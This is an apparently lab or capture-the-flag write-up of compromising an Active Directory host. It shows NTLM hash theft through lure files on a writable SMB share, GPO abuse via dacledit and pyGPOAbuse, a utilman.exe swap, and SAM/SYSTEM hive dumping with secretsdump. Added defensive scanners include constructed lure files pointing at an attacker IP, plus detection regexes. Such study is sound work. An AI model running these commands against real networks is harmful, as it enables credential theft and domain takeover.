Enumeration

Nmap

The initial Nmap scan revealed that SMB and several common Active Directory ports were open.

[Screenshot: 00 - nmap]

SMB Null

An SMB null session was available. Moreover, there was a share on which we had both read and write permissions.

[Screenshot: 01 - smb null]

The share was empty as seen below.

[Screenshot: 02 - empty share]

Exploitation

NTLM Theft

Because the share was empty and I had write permission on it, I placed the files generated by ntlm_theft on the share while listening with Responder.

[Screenshot: 03 - ntlm_theft]

The .lnk file worked and I obtained the user's NTLMv2 hash.

[Screenshot: 04 - lnk file]

[Screenshot: 05 - hash]
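From the defender's side, the condition that made this step work is a writable share that anyone can drop files into, combined with Windows Explorer resolving icon and target paths in .url, .scf, desktop.ini, .library-ms and .lnk files without a click. The following scanner, added here as an example and not part of the original post or of ntlm_theft, walks a copy of a share, extracts every UNC or file:// host those files reference, and reports hosts that are not on an allow-list of known file servers. The sample share, the allow-list and the 10.10.14.5 address are constructed.

```python
"""Flag lure files on a writable share that point to an unexpected UNC host.

Constructed example for this write-up (not part of the original post or of
ntlm_theft). It walks a copy of a share, pulls UNC / file:// host names out of
the text-based formats Explorer resolves automatically (.url, .scf,
desktop.ini, .library-ms) and out of .lnk binaries (UTF-16LE strings), and
reports hosts that are not on the allow-list of known file servers.
"""
import re
import tempfile
from pathlib import Path

# File types Explorer parses (and may authenticate to) as soon as a folder is opened.
LURE_EXTENSIONS = {".url", ".scf", ".ini", ".library-ms", ".lnk"}

# \\host\share\... or file://host/...  Host = letters, digits, dots, dashes.
UNC_RE = re.compile(r"(?:\\\\|file://+)([A-Za-z0-9][A-Za-z0-9.\-]*)[\\/]", re.IGNORECASE)


def extract_hosts(data: bytes) -> set:
    """Return the set of host names referenced by UNC/file:// paths in `data`.

    The bytes are decoded as latin-1 (ASCII/ANSI text files) and as UTF-16LE at
    both byte offsets (how .lnk files and many Windows-written files store
    strings), so a host is found whichever encoding the file uses."""
    views = (
        data.decode("latin-1"),
        data.decode("utf-16-le", errors="ignore"),
        data[1:].decode("utf-16-le", errors="ignore"),
    )
    hosts = set()
    for text in views:
        hosts.update(h.lower() for h in UNC_RE.findall(text))
    return hosts


def find_unc_lures(share_root, allowed_hosts) -> list:
    """Return (file name, host) pairs for every lure-type file that references a host
    outside `allowed_hosts`. Pass a local copy or a mount point of the share."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in sorted(Path(share_root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in LURE_EXTENSIONS:
            continue
        for host in sorted(extract_hosts(path.read_bytes())):
            if host not in allowed:
                findings.append((path.name, host))
    return findings


def demo() -> list:
    """Build a constructed share in a temp directory and scan it."""
    root = Path(tempfile.mkdtemp())
    # Constructed .url lure: both the target and the icon point at an unknown host.
    (root / "report.url").write_text(
        "[InternetShortcut]\r\nURL=file://10.10.14.5/share/report.pdf\r\n"
        "IconFile=\\\\10.10.14.5\\share\\icon.ico\r\n"
    )
    # Constructed benign desktop.ini: icon on the allow-listed file server.
    (root / "desktop.ini").write_text(
        "[.ShellClassInfo]\r\nIconResource=\\\\fileserver01\\icons\\folder.ico,0\r\n"
    )
    # Constructed minimal stand-in for a .lnk: a UTF-16LE target path after a header.
    (root / "notes.lnk").write_bytes(
        b"L\x00\x00\x00" + "\\\\10.10.14.5\\x\\notes.txt".encode("utf-16-le")
    )
    return find_unc_lures(root, ["fileserver01"])


if __name__ == "__main__":
    for name, host in demo():
        print(f"{name}: references unexpected host {host}")
```

Run it against a mounted or copied share on a schedule; anything it reports is either a misconfiguration or a planted lure, and the referenced host is the address that would receive the forced authentication. Tightening the share ACL so unauthenticated users cannot write, and blocking outbound SMB at the perimeter, remove the condition rather than just detecting it.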

Then I simply cracked it using hashcat.

[Screenshot: 06 - cracked]

And obtained the user flag.

[Screenshot: 07 - user flag]

Privilege Escalation (1st way - GPO Abuse)

Bloodhound Python

After obtaining the user's credentials I ran bloodhound-python.

[Screenshot: 12 - bloodhound python]

Then I found out that the user had WriteDACL permission over the Default Domain Policy GPO.

[Screenshot: 13 - gpo writedacl]

GPO Abuse

First I used impacket-dacledit to grant myself GenericAll (FullControl) rights over the GPO.

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ANIRUDH' -target-dn 'CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=POLICIES,CN=SYSTEM,DC=VAULT,DC=OFFSEC' 'vault.offsec'/'anirudh':'<PASSWORD>' 

[Screenshot: 14 - dacledit]

Then, using the pyGPOAbuse tool, I abused the default GPO: it adds a scheduled task that creates a user named John with the password H4x00r123...

[Screenshot: 15 - pygpoabuse]

Then, in the user's WinRM shell, I ran gpupdate /force to apply the updated GPO.

[Screenshot: 16 - gpupdate]

Then I simply logged in as John and read the admin flag.

[Screenshot: 17 - gg]
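The root cause of this whole path is a single ACE: a regular user holding WriteDACL on a GPO, which lets them grant themselves FullControl exactly as the dacledit step did. The audit below is an added example (not code from the original post, BloodHound or impacket): it parses the DACL portion of a GPO's security descriptor in SDDL form and reports every allow ACE that grants GenericAll, GenericWrite, WriteDacl, WriteOwner or WriteProperty to a principal outside the expected administrative set. The sample descriptor and its domain SID are constructed; the allow-list of SDDL aliases (Domain Admins, Enterprise Admins, SYSTEM, CREATOR OWNER) is the set that holds full control on a default GPO.

```python
"""Audit a GPO's security descriptor (SDDL) for write rights held by
principals that should not be able to edit Group Policy.

Added example for this write-up, not code from the original post, from
BloodHound or from impacket. Only the DACL part of the SDDL string is parsed;
the sample descriptor below is constructed.
"""
import re

# Access-mask bits, used when SDDL writes the rights field as a hex number.
RIGHT_BITS = {
    0x10000000: "GA", 0x20000000: "GX", 0x40000000: "GW", 0x80000000: "GR",
    0x00010000: "SD", 0x00020000: "RC", 0x00040000: "WD", 0x00080000: "WO",
    0x00000001: "CC", 0x00000002: "DC", 0x00000004: "LC", 0x00000008: "SW",
    0x00000010: "RP", 0x00000020: "WP", 0x00000040: "DT", 0x00000080: "LO",
    0x00000100: "CR",
}
# Rights that let the holder change the GPO or its ACL: GenericAll,
# GenericWrite, WriteDacl, WriteOwner, WriteProperty.
WRITE_RIGHTS = {"GA", "GW", "WD", "WO", "WP"}
# SDDL aliases that hold full control of a default GPO by design:
# Domain Admins, Enterprise Admins, SYSTEM, CREATOR OWNER.
DEFAULT_ALLOWED = {"DA", "EA", "SY", "CO"}


def decode_rights(field: str) -> set:
    """Turn an SDDL rights field ('RPWPCCDC...' or '0x40000') into 2-letter codes."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {code for bit, code in RIGHT_BITS.items() if mask & bit}
    return {field[i:i + 2].upper() for i in range(0, len(field), 2)}


def dacl_aces(sddl: str) -> list:
    """Return the DACL's ACEs, each as the list of its ';'-separated fields."""
    start = sddl.find("D:")
    if start < 0:
        return []
    end = sddl.find("S:", start)          # an SACL, if present, follows the DACL
    dacl = sddl[start + 2:end if end > 0 else None]
    return [ace.split(";") for ace in re.findall(r"\(([^)]*)\)", dacl)]


def audit_gpo_dacl(sddl: str, allowed=DEFAULT_ALLOWED) -> list:
    """List allow ACEs that grant a write right to a principal outside `allowed`.

    Each finding carries the principal (SDDL alias or SID), the dangerous
    rights it holds, and the object GUID for object-specific ACEs so an
    analyst can check which property or child type the grant covers."""
    findings = []
    for ace in dacl_aces(sddl):
        if len(ace) != 6:
            continue                      # conditional or malformed ACE: do not guess
        ace_type, _flags, rights, object_guid, _inherit_guid, sid = ace
        if ace_type not in ("A", "OA"):
            continue                      # only allow ACEs grant rights
        dangerous = decode_rights(rights) & WRITE_RIGHTS
        if dangerous and sid not in allowed:
            findings.append({"principal": sid, "rights": sorted(dangerous),
                             "object_type": object_guid})
    return findings


# Constructed descriptor: the default full-control grants plus one extra ACE
# giving a regular domain user (RID 1105, made-up domain SID) WriteDacl and WriteOwner.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;CI;RPWPCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;CI;RPWPCCDCLCLORCWOWDSDDTSW;;;EA)"
    "(A;CI;RPWPCCDCLCLORCWOWDSDDTSW;;;SY)"
    "(A;CI;RPLCLORC;;;AU)"
    "(A;CI;RPLCLORC;;;ED)"
    "(A;CI;RCWDWO;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
)

if __name__ == "__main__":
    for finding in audit_gpo_dacl(SAMPLE_SDDL):
        print(finding)
```

Feed it the nTSecurityDescriptor of each object under CN=Policies,CN=System in SDDL form and review every finding; if a grant is legitimate (a delegated GPO-editing group), add that group's SID to the allow-list rather than ignoring the right. Auditing changes to these descriptors is the matching detection, since the dacledit step modifies exactly this attribute.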

Privilege Escalation (2nd way - SeRestore Privilege)

The user had SeRestorePrivilege and the RDP port was open, so I could simply overwrite C:\Windows\System32\utilman.exe with cmd.exe.

[Screenshot: 18 - restore priv]

Then I used rdesktop to reach the lock screen.

[Screenshot: 19 - rdesktop]

Then I simply pressed Windows+U on my keyboard and got a SYSTEM shell.

[Screenshot: 20 - gg]

Privilege Escalation (Failed way - SeBackup Privilege)

Trying to dump Admin Hash

SeBackupPrivilege was enabled, so we could simply copy the SYSTEM and SAM hives and dump the Administrator credentials.

[Screenshot: 08 - sebackupprivilege]

I used the commands below to copy SYSTEM and SAM.

cd c:\ProgramData
reg save hklm\sam sam_bak
reg save hklm\system system_bak

[Screenshot: 09 - download files]

We could use either pypykatz or impacket-secretsdump to dump the Administrator hash.

impacket-secretsdump -system system_bak -sam sam_bak LOCAL
pypykatz registry --sam sam_bak system_bak

[Screenshot: 10 - admin hash]

[Screenshot: 10 - admin hash 2]

However, we could not log in as Administrator, because the only user allowed to connect remotely is anirudh.

Trying Diskshadow and Robocopy

I then tried a different method from k4sth4/SeBackupPrivilege, which creates a shadow copy of drive C: with diskshadow and copies files out of it with robocopy.


However, that did not work either.
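Both privilege escalation attempts in the two sections above (the utilman.exe overwrite under SeRestorePrivilege, and the reg save / diskshadow / robocopy hive copies under SeBackupPrivilege) leave clear traces in process-creation telemetry. The detector below is an added example, not code from the original post or from any of the tools it names: it runs a handful of rules over Sysmon Event ID 1 / Security 4688 style records reduced to four fields and reports which rule each event triggers. The field names and every sample event are constructed.

```python
"""Detect the SeBackup / SeRestore abuse patterns from this write-up in
process-creation telemetry.

Added example for this post, not code from the original write-up or any
named tool. Events are Sysmon Event ID 1 / Security 4688 style records
reduced to four fields; the field names and all sample events are constructed.
"""
import json
import re
from pathlib import PureWindowsPath

# Binaries Windows launches as SYSTEM from the logon screen (Win+U, Shift x5, ...).
ACCESSIBILITY_BINARIES = {
    "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}

# reg save / reg export of the hives needed to recover local account hashes.
HIVE_DUMP_RE = re.compile(
    r"\breg(?:\.exe)?\s+(?:save|export)\b.*\bhklm\\(?:sam|system|security)\b", re.I)
# diskshadow, or vssadmin creating a shadow copy, to read otherwise locked files.
SHADOW_COPY_RE = re.compile(
    r"\bdiskshadow(?:\.exe)?\b|\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)
# robocopy in backup mode (/b or /zb) reads past ACLs when SeBackupPrivilege is held.
ROBOCOPY_BACKUP_RE = re.compile(r"\brobocopy(?:\.exe)?\b.*\s/z?b\b", re.I)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def detect(event: dict) -> list:
    """Return the names of every rule the event triggers (empty list if clean)."""
    image = basename(event.get("image", ""))
    cmdline = event.get("command_line", "")
    original = event.get("original_file_name", "").lower()
    hits = []
    if HIVE_DUMP_RE.search(cmdline):
        hits.append("registry_hive_dump")
    if SHADOW_COPY_RE.search(cmdline):
        hits.append("shadow_copy")
    if ROBOCOPY_BACKUP_RE.search(cmdline):
        hits.append("robocopy_backup_mode")
    # Some other process names an accessibility binary on its command line
    # (copy/move/icacls/takeown against utilman.exe etc.): the SeRestore overwrite.
    if image not in ACCESSIBILITY_BINARIES and any(
            b in cmdline.lower() for b in ACCESSIBILITY_BINARIES):
        hits.append("accessibility_binary_tampering")
    # The accessibility binary runs, but its PE version info says it is really
    # another program (cmd.exe copied over utilman.exe).
    if image in ACCESSIBILITY_BINARIES and original and original != image:
        hits.append("accessibility_binary_masquerade")
    return hits


def scan(log_text: str) -> list:
    """Run detect() over newline-delimited JSON events; return (line index, rule) pairs."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines()):
        if line.strip():
            for rule in detect(json.loads(line)):
                findings.append((line_no, rule))
    return findings


# Constructed sample events (paths and command lines are made up for the demo).
_SYS32 = r"C:\Windows\System32"
_SAMPLE_EVENTS = [
    {"image": _SYS32 + r"\reg.exe", "parent_image": _SYS32 + r"\cmd.exe",
     "command_line": r"reg save hklm\sam sam_bak", "original_file_name": "reg.exe"},
    {"image": _SYS32 + r"\reg.exe", "parent_image": _SYS32 + r"\cmd.exe",
     "command_line": r"reg save hklm\system system_bak", "original_file_name": "reg.exe"},
    {"image": _SYS32 + r"\reg.exe", "parent_image": _SYS32 + r"\cmd.exe",
     "command_line": r"reg query hklm\software\Microsoft", "original_file_name": "reg.exe"},
    {"image": _SYS32 + r"\diskshadow.exe", "parent_image": _SYS32 + r"\cmd.exe",
     "command_line": r"diskshadow /s C:\ProgramData\shadow.txt", "original_file_name": "diskshadow.exe"},
    {"image": _SYS32 + r"\Robocopy.exe", "parent_image": _SYS32 + r"\cmd.exe",
     "command_line": r"robocopy /b E:\Windows C:\ProgramData\bak /e", "original_file_name": "robocopy.exe"},
    {"image": _SYS32 + r"\cmd.exe", "parent_image": _SYS32 + r"\cmd.exe",
     "command_line": r"cmd.exe /c copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe",
     "original_file_name": "Cmd.Exe"},
    {"image": _SYS32 + r"\utilman.exe", "parent_image": _SYS32 + r"\winlogon.exe",
     "command_line": r"C:\Windows\System32\utilman.exe /debug", "original_file_name": "Cmd.Exe"},
    {"image": _SYS32 + r"\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Users\anirudh\notes.txt", "original_file_name": "NOTEPAD.EXE"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in _SAMPLE_EVENTS)

if __name__ == "__main__":
    for line_no, rule in scan(SAMPLE_LOG):
        print(f"event {line_no}: {rule}")
```

Two of the rules are worth keeping even without the others: the masquerade check catches the utilman.exe swap at the moment it is used from the lock screen, regardless of how the file was replaced, and the hive-dump rule fires on the reg save commands shown earlier whether or not the attacker can later log in with the recovered hash. The underlying fix is the same for both sections: membership in Backup Operators (the source of SeBackupPrivilege and SeRestorePrivilege) should be empty or tightly controlled, and the accessibility binaries should be covered by file-integrity monitoring.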


